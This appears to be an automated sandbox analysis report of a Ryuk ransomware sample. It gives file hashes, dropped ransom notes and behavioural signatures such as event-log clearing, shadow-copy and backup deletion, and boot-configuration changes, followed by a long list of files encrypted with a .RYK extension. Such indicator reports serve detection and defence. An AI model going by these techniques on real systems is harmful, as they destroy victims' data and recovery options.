SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\ProgramData\hrmlog1

MD5 dc7bf0d9a1ff7125f82056b89d6ec12a
SHA1 257be6d31211bbbc4ac39d874d37f342c42a7a11
SHA256 8c22f22ebc7e06d6fd8ec80be245db69daa02ec2d6527b38f2a93297a052b4a6
SHA512 d9136e3f7157feeb9a78d434594a7475a8d5776735f1bfe782d4f9b6ea51de80a5720001d9896a6249f796764000349f333e4063a0370d1a7de23bc5d8638cce

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 0a44b74e4002fb17645d86e920e84d16
SHA1 569d736c5eceb15a6363218db5d8b0f07a4f26de
SHA256 e8e744d6d9a3aa3e5783b1d1e7c5d6c34f780be7fd9adf2c9f26ec7753386287
SHA512 3ea2b3c2c87563db65fb13d7a5cf8f815f12c57d1a74c8dae70db1b6f1c5c7374ed748d8a4a1003d9bcef02db8c647ff553e4d6de03f1736a72d8ff3dc6f6cde

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 dc7bf0d9a1ff7125f82056b89d6ec12a
SHA1 257be6d31211bbbc4ac39d874d37f342c42a7a11
SHA256 8c22f22ebc7e06d6fd8ec80be245db69daa02ec2d6527b38f2a93297a052b4a6
SHA512 d9136e3f7157feeb9a78d434594a7475a8d5776735f1bfe782d4f9b6ea51de80a5720001d9896a6249f796764000349f333e4063a0370d1a7de23bc5d8638cce

C:\ProgramData\hrmlog2

MD5 0a44b74e4002fb17645d86e920e84d16
SHA1 569d736c5eceb15a6363218db5d8b0f07a4f26de
SHA256 e8e744d6d9a3aa3e5783b1d1e7c5d6c34f780be7fd9adf2c9f26ec7753386287
SHA512 3ea2b3c2c87563db65fb13d7a5cf8f815f12c57d1a74c8dae70db1b6f1c5c7374ed748d8a4a1003d9bcef02db8c647ff553e4d6de03f1736a72d8ff3dc6f6cde

C:\ProgramData\RYUKID

MD5 d795239d3f1352b71cf422ab8d1173ef
SHA1 a638a77d7113b1809ed104e966c2182804e9f6b2
SHA256 926453fb93bebe6fceb108adb3bcfa86fa3acb34a72e5d4b9df882cd30718298
SHA512 ed7d6b3576ecc3641835674c5fc55eb130011983663920b2dc00bb1c58db18eb1a19bea838d89a3c424ba69d6c9069c78d7f8ac53f55e326752959e92eae25e9

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 d795239d3f1352b71cf422ab8d1173ef
SHA1 a638a77d7113b1809ed104e966c2182804e9f6b2
SHA256 926453fb93bebe6fceb108adb3bcfa86fa3acb34a72e5d4b9df882cd30718298
SHA512 ed7d6b3576ecc3641835674c5fc55eb130011983663920b2dc00bb1c58db18eb1a19bea838d89a3c424ba69d6c9069c78d7f8ac53f55e326752959e92eae25e9

C:\ProgramData\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html

MD5 a641bf8ac8307aad57ecab53872e67db
SHA1 6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA256 9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA512 7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\RyukReadMe.html.[[email protected]].RYK

MD5 3b1ed270feb9965830536509474cc811
SHA1 3d247ef3bca5dff8731a383bf09d8f02e57b1bca
SHA256 8908e9fa9e26bc051fca82a66dadff60c85b513786dcd8d84e5ca8b42eee5d19
SHA512 aeca2bd2faf1ce40853e12c20f98a08dbb873f763322347ded7ce62c30fb8d47b96481a27e1d5de22f4a6b7d23d47bfc6b3d853f87dca9959bcfd1d60215a713

Analysis: behavioral2

Detonation Overview

Submitted

2023-03-09 18:22

Reported

2023-03-09 18:24

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"

Signatures

Ryuk

ransomware ryuk

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables taskbar notifications via registry modification

evasion

Disables use of System Restore points

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\selector.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File created C:\Program Files\RyukReadMe.html C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\db2v0801.xsl.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\en-gb\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_selected_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTest-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Trial-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\OneNote\prnSendToOneNote_win7.inf.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\local_policy.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\BLUECALM.ELM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\or.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.osmuxmui.msi.16.en-us.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_MAK-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\CSS7DATA000C.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ext.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_en_135x40.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sk_get.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\manifest.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MUOPTIN.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforsignature.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fa.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f14\FA000000014.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\PREVIEW.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\cacerts.pem.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_hover_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\en-US\MSFT_PackageManagementSource.strings.psd1.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-100.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
